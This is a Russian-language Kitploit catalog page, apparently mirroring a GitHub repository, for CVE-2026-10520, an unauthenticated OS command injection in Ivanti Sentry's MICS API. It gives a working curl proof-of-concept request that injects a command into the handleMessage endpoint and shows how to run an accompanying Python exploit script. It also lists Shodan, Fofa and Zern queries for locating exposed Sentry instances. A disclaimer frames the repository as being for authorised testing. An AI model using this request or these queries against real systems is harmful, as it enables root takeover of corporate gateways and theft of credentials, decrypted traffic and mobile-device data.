Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-10520 — RCE уровня root через внедрение команд ОС в Ivanti Sentry | Kitploit
Инструменты/GitHubGitHub/error-inside/cve-2026-10520
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и Образование
GitHuberror-inside/cve-2026-10520

CVE-2026-10520

RCE уровня root через внедрение команд ОС в Ivanti Sentry

Репозиторий
2 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-10520

Python CVSS License Educational

Ivanti Sentry (ранее MobileIron Sentry) — это корпоративный шлюз безопасности, который проксирует трафик между мобильными устройствами и корпоративными внутренними ресурсами: электронной почтой, SharePoint и внутренними веб-приложениями. Он применяет политики Управления мобильными устройствами (MDM), завершает зашифрованные мобильные сессии и выдает аутентификацию на основе сертификатов для корпоративных развертываний приложений. Экземпляры Sentry обычно доступны из интернета на порту8443, открывая административный API MICS (Mobile Iron Configuration Service).

CVE-2026-10520 — это внедрение команд ОС без аутентификации, затрагивающее Ivanti Sentry до версий R10.5.2, R10.6.2 и R10.7.1 (CVSSv3.1: 10 Critical, внесена в CISA KEV). Уязвимость находится в MICS API endpoint /mics/api/v2/sentry/mics-config/handleMessage, который принимает XML-упакованные системные команды через URL-кодированное message в POST теле без какой-либо аутентификации или проверки ввода. Злоумышленник, имеющий доступ к уязвимому endpoint, может выполнять произвольные команды ОС с правами root, получая полный контроль над хостом — включая расшифрованный корпоративный трафик, сохраненные учетные данные и все данные управляемых мобильных устройств.

PoC

root@kitploit:~
# Inject 'id' command via MICS handleMessage endpoint (no authentication required)
curl -sk -X POST "http://example.com:8443/mics/api/v2/sentry/mics-config/handleMessage" \
  -H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -H "Connection: close" \
  --data-urlencode "message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>id</reqandres></commandexec>"

Usage

root@kitploit:~
python CVE-2026-10520-X7.py
  • Zern : title:"Ivanti System Manager: Sign In"
  • Fofa : body="sentry" && body="System Manager" && port="8443", title="Ivanti System Manager: Sign In", icon_hash=="1407597555"
  • Shodan : http.html:"Ivanti Standalone Sentry System Manager" port:8443 , http.title:Ivanti port:8443, http.html:"Ivanti" http.html:"Sentry" port:8443

Ресурсы

  • OpenCVE — RCE уровня root через внедрение команд ОС в Ivanti Sentry
  • NIST — CVE-2026-10520 Detail
  • Ivanti Sentry — Официальная страница продукта

Отказ от ответственности

Этот репозиторий и его содержимое предоставляются исключительно для законного исследования безопасности, авторизованного тестирования на проникновение, образовательного изучения и защитных целей. Используя или получая доступ к этому материалу, вы принимаете на себя полную ответственность за соблюдение всех применимых законов и подтверждаете, что получили надлежащее разрешение перед тестированием или применением этих методов к любой системе, которая вам не принадлежит.

Авторы и сопровождающие этого проекта не несут ответственности за любой ущерб, юридические последствия или неправомерное использование в результате применения этой информации. Любое использование для несанкционированного доступа, вредоносной деятельности или незаконных целей категорически запрещено и не поддерживается.

Используйте ответственно. Оставайтесь в рамках закона. Тестируйте только то, что вам принадлежит или на что вы имеете явное письменное разрешение.

Авторы

  • ErrorInside // SCT

Лицензия

SCT-PL

Скачать инструмент